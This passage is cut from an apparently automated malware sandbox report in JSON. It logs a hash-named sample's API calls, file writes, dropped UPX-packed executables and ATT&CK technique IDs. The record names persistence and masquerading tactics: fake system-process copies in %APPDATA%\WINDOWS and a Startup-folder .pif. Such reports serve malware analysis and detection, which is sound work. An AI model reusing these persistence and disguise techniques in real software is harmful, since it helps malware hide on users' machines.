"Calls an API typically used to create a directory", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005192)\n \"4k51k4.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter C:\\\\4K51K4 (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005636)\n \"IExplorer.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"CreateDirectoryA\" with parameter Z:\\\\4K51K4 (UID: 00000000-00005272)\n \"WINLOGON.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002108)\n \"WINLOGON.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00002108)\n \"CSRSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003136)\n \"CSRSS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00003136)\n \"SERVICES.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005756)\n \"SERVICES.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00005756)\n \"LSASS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00000944)\n \"LSASS.EXE\" called \"CreateDirectoryA\" with parameter %APPDATA%\\WINDOWS (UID: 00000000-00000944)\n \"SMSS.EXE\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00000656)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005192)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005636)\n \"4k51k4.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005636)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%WINDIR%\\system32\\IExplorer.exe\" - (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" - (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" - (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" - (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\LSASS.EXE\" - (UID: 00000000-00005272)\n \"IExplorer.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\WINDOWS\\SMSS.EXE\" - (UID: 00000000-00005272)\n \"WINLOGON.EXE\" called \"CreateProcessW\" with parameter \"%WINDIR%\\4k51k4.exe\" - (UID: 00000000-00002108)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has an writable section named \"UPX0\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has an writable section named \"UPX1\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has an writable section named \".rsrc\"\n \"services.exe\" has an writable section named \"UPX0\"\n \"services.exe\" has an writable section named \"UPX1\"\n \"services.exe\" has an writable section named \".rsrc\"\n \"4k51k4.exe.bin\" has an writable section named \"UPX0\"\n \"4k51k4.exe.bin\" has an writable section named \"UPX1\"\n \"4k51k4.exe.bin\" has an writable section named \".rsrc\"\n \"shell.exe\" has an writable section named \"UPX0\"\n \"shell.exe\" has an writable section named \"UPX1\"\n \"shell.exe\" has an writable section named \".rsrc\"\n \"Empty.pif\" has an writable section named \"UPX0\"\n \"Empty.pif\" has an writable section named \"UPX1\"\n \"Empty.pif\" has an writable section named \".rsrc\"\n \"4K51K4.EXE.67A9C38A.bin\" has an writable section named \"UPX0\"\n \"4K51K4.EXE.67A9C38A.bin\" has an writable section named \"UPX1\"\n \"4K51K4.EXE.67A9C38A.bin\" has an writable section named \".rsrc\"\n \"CSRSS.EXE.bin\" has an writable section named \"UPX0\"\n \"CSRSS.EXE.bin\" has an writable section named \"UPX1\"\n \"CSRSS.EXE.bin\" has an writable section named \".rsrc\"\n \"4K51K4.EXE.67A9DE16.bin\" has an writable section named \"UPX0\"\n \"4K51K4.EXE.67A9DE16.bin\" has an writable section named \"UPX1\"\n \"4K51K4.EXE.67A9DE16.bin\" has an writable section named \".rsrc\"\n \"SERVICES.EXE\" has an writable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has an executable section named \"UPX0\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has an executable section named \"UPX1\"\n \"services.exe\" has an executable section named \"UPX0\"\n \"services.exe\" has an executable section named \"UPX1\"\n \"4k51k4.exe.bin\" has an executable section named \"UPX0\"\n \"4k51k4.exe.bin\" has an executable section named \"UPX1\"\n \"shell.exe\" has an executable section named \"UPX0\"\n \"shell.exe\" has an executable section named \"UPX1\"\n \"Empty.pif\" has an executable section named \"UPX0\"\n \"Empty.pif\" has an executable section named \"UPX1\"\n \"4K51K4.EXE.67A9C38A.bin\" has an executable section named \"UPX0\"\n \"4K51K4.EXE.67A9C38A.bin\" has an executable section named \"UPX1\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX0\"\n \"CSRSS.EXE.bin\" has an executable section named \"UPX1\"\n \"4K51K4.EXE.67A9DE16.bin\" has an executable section named \"UPX0\"\n \"4K51K4.EXE.67A9DE16.bin\" has an executable section named \"UPX1\"\n \"SERVICES.EXE\" has an executable section named \"UPX0\"\n \"SERVICES.EXE\" has an executable section named \"UPX1\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" has an executable section named \"UPX0\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" has an executable section named \"UPX1\"\n \"SMSS.EXE\" has an executable section named \"UPX0\"\n \"SMSS.EXE\" has an executable section named \"UPX1\"\n \"LSASS.EXE\" has an executable section named \"UPX0\"\n \"LSASS.EXE\" has an executable section named \"UPX1\"\n \"MrHelloween.scr\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"services.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4k51k4.exe.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"shell.exe\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"Empty.pif\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9C38A.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"CSRSS.EXE.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"4K51K4.EXE.67A9DE16.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SERVICES.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"SMSS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"LSASS.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"MrHelloween.scr\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"IEXPLORER.EXE.67A9C38C.bin\" was detected as \"Netopsystems FEAD Optimizer 1\"\n \"WINLOGON.EXE\" was detected as \"Netopsystems FEAD Optimizer 1\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\MSVBVM60.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\SXS.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\dwmapi.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\LSASS.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SMSS.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Windows\\4k51k4.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\4k51k4.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shell.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\Local Settings\\Application.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" connecting to \"\\ThemeApiPort\"\n \"4k51k4.exe\" connecting to \"\\ThemeApiPort\"\n \"IExplorer.exe\" connecting to \"\\ThemeApiPort\"\n \"CSRSS.EXE\" connecting to \"\\ThemeApiPort\"\n \"SERVICES.EXE\" connecting to \"\\ThemeApiPort\"\n \"SMSS.EXE\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\users\\desktop.ini\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\users\\%osuser%\\documents\\desktop.ini\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\windows\\4k51k4.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\4k51k4.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\windows\\system32\\shell.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\windows\\system32\\iexplorer.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Windows\\4k51k4.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Windows\\System32\\shell.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Windows\\System32\\MrHelloween.scr\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Windows\\System32\\IExplorer.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\WINLOGON.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\CSRSS.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\Local Settings\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINDOWS\\SERVICES.EXE\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" queries basic process information of the \"C:\\share\\4K51K4\\Folder.htt\" (UID: 5192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" queries basic process information of the \"C:\\Users\\HAPUBWS\\AppData\\Local\\lsass.exe\" (UID: 5192)\n \"4k51k4.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 5636)\n \"4k51k4.exe\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 5636)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\\4K51K4\\Folder.htt\" (UID: 5272)\n \"IExplorer.exe\" queries basic process information of the \"C:\\share\\Data HAPUBWS.exe\" (UID: 5272)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\share\" (UID: 2108)\n \"WINLOGON.EXE\" queries basic process information of the \"C:\\Windows\\System32\\tzres.dll\" (UID: 2108)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\MSVBVM60.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\MSVBVM60.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\rpcss.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\CRYPTBASE.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\CRYPTBASE.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"\\Device\\KsecDD\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\uxtheme.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe.cfg\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\SXS.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\SXS.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe.cfg\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe.Local\\\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" trying to access non-existent file \"C:\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.pif\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\share\\4k51k4\\folder.htt\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\users\\hapubws\\appdata\\local\\csrss.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\windows\\4k51k4.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\4k51k4.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\windows\\system32\\shell.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\windows\\system32\\mrhelloween.scr\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\windows\\system32\\iexplorer.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\empty.pif\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\winlogon.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\csrss.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\services.exe\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\windows\\lsass.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4k51k4.exe.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4K51K4.EXE.67A9C38A.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows UPX compressed\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable 